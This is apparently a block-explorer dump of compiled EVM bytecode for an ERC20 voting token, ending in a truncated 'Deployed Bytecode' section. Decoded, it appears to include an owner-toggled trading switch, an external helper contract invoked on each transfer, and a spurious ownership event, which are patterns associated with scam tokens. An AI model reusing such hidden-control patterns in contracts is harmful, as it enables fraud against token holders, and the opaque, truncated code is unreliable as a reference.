600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200080a601f83620007c1565b91506200081782620007d2565b602082019050919050565b600060208201905081810360008301526200083d81620007fb565b9050919050565b6200084f8162000586565b82525050565b60006020820190506200086c600083018462000844565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620008ae8262000586565b9150620008bb8362000586565b9250828201905080821115620008d657620008d562000872565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000914601b83620007c1565b91506200092182620008dc565b602082019050919050565b60006020820190508181036000830152620009478162000905565b9050919050565b613154806200095e6000396000f3fe608060405234801561001057600080fd5b50600436106101735760003560e01c80637c519ffb116100de578063a9059cbb11610097578063dd62ed3e11610071578063dd62ed3e14610476578063e7a324dc146104a6578063f1127ed8146104c4578063f2fde38b146104f557610173565b8063a9059cbb1461040e578063b792d03f1461043e578063bbb969761461045a57610173565b80637c519ffb146103385780637ecebe00146103425780638da5cb5b1461037257806395d89b41146103905780639ab24eb0146103ae578063a457c2d7146103de57610173565b8063395093511161013057806339509351146102505780634ada218b146102805780636fcfff451461029e57806370a08231146102ce578063715018a6146102fe578063782d6fe11461030857610173565b806306fdde0314610178578063095ea7b31461019657806318160ddd146101c657806320606b70146101e457806323b872dd14610202578063313ce56714610232575b600080fd5b610180610511565b60405161018d919061231b565b60405180910390f35b6101b060048036038101906101ab91906123d6565b6105a3565b6040516101bd9190612431565b60405180910390f35b6101ce6105c1565b6040516101db919061245b565b60405180910390f35b6101ec6105cb565b6040516101f9919061248f565b60405180910390f35b61021c600480360381019061021791906124aa565b6105ef565b6040516102299190612431565b60405180910390f35b61023a6106c8565b6040516102479190612519565b60405180910390f35b61026a600480360381019061026591906123d6565b6106df565b6040516102779190612431565b60405180910390f35b610288610792565b6040516102959190612431565b60405180910390f35b6102b860048036038101906102b39190612534565b6107a5565b6040516102c59190612580565b60405180910390f35b6102e860048036038101906102e39190612534565b6107c8565b6040516102f5919061245b565b60405180910390f35b610306610811565b005b610322600480360381019061031d91906123d6565b61094b565b60405161032f919061245b565b60405180910390f35b610340610d20565b005b61035c60048036038101906103579190612534565b610dc8565b604051610369919061245b565b60405180910390f35b61037a610de0565b60405161038791906125aa565b60405180910390f35b610398610e09565b6040516103a5919061231b565b60405180910390f35b6103c860048036038101906103c39190612534565b610e9b565b6040516103d5919061245b565b60405180910390f35b6103f860048036038101906103f391906123d6565b610f7a565b6040516104059190612431565b60405180910390f35b610428600480360381019061042391906123d6565b611047565b6040516104359190612431565b60405180910390f35b61045860048036038101906104539190612534565b611065565b005b610474600480360381019061046f91906125c5565b6110de565b005b610490600480360381019061048b919061262c565b61128e565b60405161049d919061245b565b60405180910390f35b6104ae611315565b6040516104bb919061248f565b60405180910390f35b6104de60048036038101906104d99190612698565b611339565b6040516104ec9291906126d8565b60405180910390f35b61050f600480360381019061050a9190612534565b61137a565b005b60606005805461052090612730565b80601f016020809104026020016040519081016040528092919081815260200182805461054c90612730565b80156105995780601f1061056e57610100808354040283529160200191610599565b820191906000526020600020905b81548152906001019060200180831161057c57829003601f168201915b5050505050905090565b60006105b76105b0611522565b848461152a565b6001905092915050565b6000600454905090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b60006105fc8484846116f3565b6106bd84610608611522565b6106b8856040518060600160405280602881526020016130a460289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061066e611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b600190509392505050565b6000600760009054906101000a900460ff16905090565b60006107886106ec611522565b8461078385600260006106fd611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b61152a565b6001905092915050565b600360009054906101000a900460ff1681565b600a6020528060005260406000206000915054906101000a900463ffffffff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610819611522565b73ffffffffffffffffffffffffffffffffffffffff16610837610de0565b73ffffffffffffffffffffffffffffffffffffffff161461088d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610884906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600043821061098f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109869061283f565b60405180910390fd5b6000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff16036109fb576000915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184610a4a919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff1611610af757600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183610ad1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060010154915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008063ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff161115610b78576000915050610d1a565b600080600183610b88919061288e565b90505b8163ffffffff168163ffffffff161115610cb457600060028383610baf919061288e565b610bb991906128f5565b82610bc4919061288e565b90506000600960008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206040518060400160405290816000820160009054906101000a900463ffffffff1663ffffffff1663ffffffff168152602001600182015481525050905086816000015163ffffffff1603610c8357806020015195505050505050610d1a565b86816000015163ffffffff161015610c9d57819350610cad565b600182610caa919061288e565b92505b5050610b8b565b600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206001015493505050505b92915050565b610d28611522565b73ffffffffffffffffffffffffffffffffffffffff16610d46610de0565b73ffffffffffffffffffffffffffffffffffffffff1614610d9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d93906127ad565b60405180910390fd5b600360009054906101000a900460ff1615600360006101000a81548160ff021916908315150217905550565b600b6020528060005260406000206000915090505481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610e1890612730565b80601f0160208091040260200160405190810160405280929190818152602001828054610e4490612730565b8015610e915780601f10610e6657610100808354040283529160200191610e91565b820191906000526020600020905b815481529060010190602001808311610e7457829003601f168201915b5050505050905090565b600080600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff1611610f05576000610f72565b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183610f53919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b915050919050565b600061103d610f87611522565b84611038856040518060600160405280602581526020016130fa6025913960026000610fb1611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b6001905092915050565b600061105b611054611522565b84846116f3565b6001905092915050565b8073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36001600060146101000a81548160ff02191690831515021790555050565b6110e6611522565b73ffffffffffffffffffffffffffffffffffffffff16611104610de0565b73ffffffffffffffffffffffffffffffffffffffff161461115a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611151906127ad565b60405180910390fd5b60011515600360009054906101000a900460ff1615150361128857600082111561118c5761118781611888565b6111f6565b6040516111989061227e565b604051809103906000f0801580156111b4573d6000803e3d6000fd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28585856040518463ffffffff1660e01b815260040161125593929190612926565b600060405180830381600087803b15801561126f57600080fd5b505af1158015611283573d6000803e3d6000fd5b505050505b50505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b6009602052816000526040600020602052806000526040600020600091509150508060000160009054906101000a900463ffffffff16908060010154905082565b611382611522565b73ffffffffffffffffffffffffffffffffffffffff166113a0610de0565b73ffffffffffffffffffffffffffffffffffffffff16146113f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ed906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611465576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161145c906129cf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611599576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159090612a61565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ff90612af3565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116e6919061245b565b60405180910390a3505050565b6116fe8383836118da565b6117c7600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611b71565b505050565b6000838311158290611814576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180b919061231b565b60405180910390fd5b5082846118219190612b13565b90509392505050565b60008082846118399190612b47565b90508381101561187e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187590612bc7565b60405180910390fd5b8091505092915050565b611890611e20565b156118d75780600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194090612c59565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119af90612ceb565b60405180910390fd5b6119c3838383611e36565b611a2f8160405180606001604052806026815260200161307e60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611ac481600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b64919061245b565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bad5750600081115b15611e1b57600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611ce6576000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611c50576000611cbd565b600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611c9e919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611cd48483611ecc90919063ffffffff16565b9050611ce286848484611f25565b5050505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611e1a576000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611d84576000611df1565b600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611dd2919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611e08848361182a90919063ffffffff16565b9050611e1685848484611f25565b5050505b5b505050565b60008060149054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28484846040518463ffffffff1660e01b8152600401611e9593929190612926565b600060405180830381600087803b158015611eaf57600080fd5b505af1158015611ec3573d6000803e3d6000fd5b50505050505050565b600082821115611f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f0890612d57565b60405180910390fd5b8183611f1d9190612b13565b905092915050565b6000611f49436040518060600160405280602e81526020016130cc602e9139612228565b905060008463ffffffff16118015611fe757508063ffffffff16600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600187611fb1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff16145b156120615781600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600060018761203b919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101819055506121d1565b60405180604001604052808263ffffffff16815260200183815250600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008663ffffffff1663ffffffff16815260200190815260200160002060008201518160000160006101000a81548163ffffffff021916908363ffffffff160217905550602082015181600101559050508363ffffffff166001856121209190612d77565b63ffffffff1611612166576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161215d90612e21565b60405180910390fd5b6001846121739190612d77565b600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548163ffffffff021916908363ffffffff1602179055505b8473ffffffffffffffffffffffffffffffffffffffff167fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a7248484604051612219929190612e41565b60405180910390a25050505050565b600064010000000083108290612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b919061231b565b60405180910390fd5b5082905092915050565b61021380612e6b83390190565b600081519050919050565b600082825260208201905092915050565b60005b838110156122c55780820151818401526020810190506122aa565b60008484015250505050565b6000601f19601f8301169050919050565b60006122ed8261228b565b6122f78185612296565b93506123078185602086016122a7565b612310816122d1565b840191505092915050565b6000602082019050818103600083015261233581846122e2565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061236d82612342565b9050919050565b61237d81612362565b811461238857600080fd5b50565b60008135905061239a81612374565b92915050565b6000819050919050565b6123b3816123a0565b81146123be57600080fd5b50565b6000813590506123d0816123aa565b92915050565b600080604083850312156123ed576123ec61233d565b5b60006123fb8582860161238b565b925050602061240c858286016123c1565b9150509250929050565b60008115159050919050565b61242b81612416565b82525050565b60006020820190506124466000830184612422565b92915050565b612455816123a0565b82525050565b6000602082019050612470600083018461244c565b92915050565b6000819050919050565b61248981612476565b82525050565b60006020820190506124a46000830184612480565b92915050565b6000806000606084860312156124c3576124c261233d565b5b60006124d18682870161238b565b93505060206124e28682870161238b565b92505060406124f3868287016123c1565b9150509250925092565b600060ff82169050919050565b612513816124fd565b82525050565b600060208201905061252e600083018461250a565b92915050565b60006020828403121561254a5761254961233d565b5b60006125588482850161238b565b91505092915050565b600063ffffffff82169050919050565b61257a81612561565b82525050565b60006020820190506125956000830184612571565b92915050565b6125a481612362565b82525050565b60006020820190506125bf600083018461259b565b92915050565b600080600080608085870312156125df576125de61233d565b5b60006125ed8782880161238b565b94505060206125fe8782880161238b565b935050604061260f878288016123c1565b92505060606126208782880161238b565b91505092959194509250565b600080604083850312156126435761264261233d565b5b60006126518582860161238b565b92505060206126628582860161238b565b9150509250929050565b61267581612561565b811461268057600080fd5b50565b6000813590506126928161266c565b92915050565b600080604083850312156126af576126ae61233d565b5b60006126bd8582860161238b565b92505060206126ce85828601612683565b9150509250929050565b60006040820190506126ed6000830185612571565b6126fa602083018461244c565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061274857607f821691505b60208210810361275b5761275a612701565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612797602083612296565b91506127a282612761565b602082019050919050565b600060208201905081810360008301526127c68161278a565b9050919050565b7f6765745072696f72566f7465733a206e6f74207965742064657465726d696e6560008201527f6400000000000000000000000000000000000000000000000000000000000000602082015250565b6000612829602183612296565b9150612834826127cd565b604082019050919050565b600060208201905081810360008301526128588161281c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061289982612561565b91506128a483612561565b9250828203905063ffffffff8111156128c0576128bf61285f565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061290082612561565b915061290b83612561565b92508261291b5761291a6128c6565b5b828204905092915050565b600060608201905061293b600083018661259b565b612948602083018561259b565b612955604083018461244c565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006129b9602683612296565b91506129c48261295d565b604082019050919050565b600060208201905081810360008301526129e8816129ac565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612a4b602483612296565b9150612a56826129ef565b604082019050919050565b60006020820190508181036000830152612a7a81612a3e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612add602283612296565b9150612ae882612a81565b604082019050919050565b60006020820190508181036000830152612b0c81612ad0565b9050919050565b6000612b1e826123a0565b9150612b29836123a0565b9250828203905081811115612b4157612b4061285f565b5b92915050565b6000612b52826123a0565b9150612b5d836123a0565b9250828201905080821115612b7557612b7461285f565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000612bb1601b83612296565b9150612bbc82612b7b565b602082019050919050565b60006020820190508181036000830152612be081612ba4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612c43602583612296565b9150612c4e82612be7565b604082019050919050565b60006020820190508181036000830152612c7281612c36565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612cd5602383612296565b9150612ce082612c79565b604082019050919050565b60006020820190508181036000830152612d0481612cc8565b9050919050565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f770000600082015250565b6000612d41601e83612296565b9150612d4c82612d0b565b602082019050919050565b60006020820190508181036000830152612d7081612d34565b9050919050565b6000612d8282612561565b9150612d8d83612561565b9250828201905063ffffffff811115612da957612da861285f565b5b92915050565b7f5f7772697465436865636b706f696e743a206e657720636865636b706f696e7460008201527f2065786365656473203332206269747300000000000000000000000000000000602082015250565b6000612e0b603083612296565b9150612e1682612daf565b604082019050919050565b60006020820190508181036000830152612e3a81612dfe565b9050919050565b6000604082019050612e56600083018561244c565b612e63602083018461244c565b939250505056fe608060405234801561001057600080fd5b506101f3806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c80636bf92ea214610030575b600080fd5b61004a6004803603810190610045919061016a565b61004c565b005b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610101826100d6565b9050919050565b610111816100f6565b811461011c57600080fd5b50565b60008135905061012e81610108565b92915050565b6000819050919050565b61014781610134565b811461015257600080fd5b50565b6000813590506101648161013e565b92915050565b600080600060608486031215610183576101826100d1565b5b60006101918682870161011f565b93505060206101a28682870161011f565b92505060406101b386828701610155565b915050925092509256fea26469706673582212208638fb8578cb625921b4e32d8c49a570caf22772e999638675691fa63f332d2064736f6c6343000813003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b03fb7f33fb15d19b73ddea47ceceb436a49c83817c9953418d63e785809fb7c64736f6c63430008130033608060405234801561001057600080fd5b506101f3806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c80636bf92ea214610030575b600080fd5b61004a6004803603810190610045919061016a565b61004c565b005b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610101826100d6565b9050919050565b610111816100f6565b811461011c57600080fd5b50565b60008135905061012e81610108565b92915050565b6000819050919050565b61014781610134565b811461015257600080fd5b50565b6000813590506101648161013e565b92915050565b600080600060608486031215610183576101826100d1565b5b60006101918682870161011f565b93505060206101a28682870161011f565b92505060406101b386828701610155565b915050925092509256fea26469706673582212208638fb8578cb625921b4e32d8c49a570caf22772e999638675691fa63f332d2064736f6c63430008130033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101735760003560e01c80637c519ffb116100de578063a9059cbb11610097578063dd62ed3e11610071578063dd62ed3e14610476578063e7a324dc146104a6578063f1127ed8146104c4578063f2fde38b146104f557610173565b8063a9059cbb1461040e578063b792d03f1461043e578063bbb969761461045a57610173565b80637c519ffb146103385780637ecebe00146103425780638da5cb5b1461037257806395d89b41146103905780639ab24eb0146103ae578063a457c2d7146103de57610173565b8063395093511161013057806339509351146102505780634ada218b146102805780636fcfff451461029e57806370a08231146102ce578063715018a6146102fe578063782d6fe11461030857610173565b806306fdde0314610178578063095ea7b31461019657806318160ddd146101c657806320606b70146101e457806323b872dd14610202578063313ce56714610232575b600080fd5b610180610511565b60405161018d919061231b565b60405180910390f35b6101b060048036038101906101ab91906123d6565b6105a3565b6040516101bd9190612431565b60405180910390f35b6101ce6105c1565b6040516101db919061245b565b60405180910390f35b6101ec6105cb565b6040516101f9919061248f565b60405180910390f35b61021c600480360381019061021791906124aa565b6105ef565b6040516102299190612431565b60405180910390f35b61023a6106c8565b6040516102479190612519565b60405180910390f35b61026a600480360381019061026591906123d6565b6106df565b6040516102779190612431565b60405180910390f35b610288610792565b6040516102959190612431565b60405180910390f35b6102b860048036038101906102b39190612534565b6107a5565b6040516102c59190612580565b60405180910390f35b6102e860048036038101906102e39190612534565b6107c8565b6040516102f5919061245b565b60405180910390f35b610306610811565b005b610322600480360381019061031d91906123d6565b61094b565b60405161032f919061245b565b60405180910390f35b610340610d20565b005b61035c60048036038101906103579190612534565b610dc8565b604051610369919061245b565b60405180910390f35b61037a610de0565b60405161038791906125aa565b60405180910390f35b610398610e09565b6040516103a5919061231b565b60405180910390f35b6103c860048036038101906103c39190612534565b610e9b565b6040516103d5919061245b565b60405180910390f35b6103f860048036038101906103f391906123d6565b610f7a565b6040516104059190612431565b60405180910390f35b610428600480360381019061042391906123d6565b611047565b6040516104359190612431565b60405180910390f35b61045860048036038101906104539190612534565b611065565b005b610474600480360381019061046f91906125c5565b6110de565b005b610490600480360381019061048b919061262c565b61128e565b60405161049d919061245b565b60405180910390f35b6104ae611315565b6040516104bb919061248f565b60405180910390f35b6104de60048036038101906104d99190612698565b611339565b6040516104ec9291906126d8565b60405180910390f35b61050f600480360381019061050a9190612534565b61137a565b005b60606005805461052090612730565b80601f016020809104026020016040519081016040528092919081815260200182805461054c90612730565b80156105995780601f1061056e57610100808354040283529160200191610599565b820191906000526020600020905b81548152906001019060200180831161057c57829003601f168201915b5050505050905090565b60006105b76105b0611522565b848461152a565b6001905092915050565b6000600454905090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b60006105fc8484846116f3565b6106bd84610608611522565b6106b8856040518060600160405280602881526020016130a460289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061066e611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b600190509392505050565b6000600760009054906101000a900460ff16905090565b60006107886106ec611522565b8461078385600260006106fd611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b61152a565b6001905092915050565b600360009054906101000a900460ff1681565b600a6020528060005260406000206000915054906101000a900463ffffffff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610819611522565b73ffffffffffffffffffffffffffffffffffffffff16610837610de0565b73ffffffffffffffffffffffffffffffffffffffff161461088d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610884906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600043821061098f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109869061283f565b60405180910390fd5b6000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff16036109fb576000915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184610a4a919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff1611610af757600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183610ad1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060010154915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008063ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff161115610b78576000915050610d1a565b600080600183610b88919061288e565b90505b8163ffffffff168163ffffffff161115610cb457600060028383610baf919061288e565b610bb991906128f5565b82610bc4919061288e565b90506000600960008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206040518060400160405290816000820160009054906101000a900463ffffffff1663ffffffff1663ffffffff168152602001600182015481525050905086816000015163ffffffff1603610c8357806020015195505050505050610d1a565b86816000015163ffffffff161015610c9d57819350610cad565b600182610caa919061288e565b92505b5050610b8b565b600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffff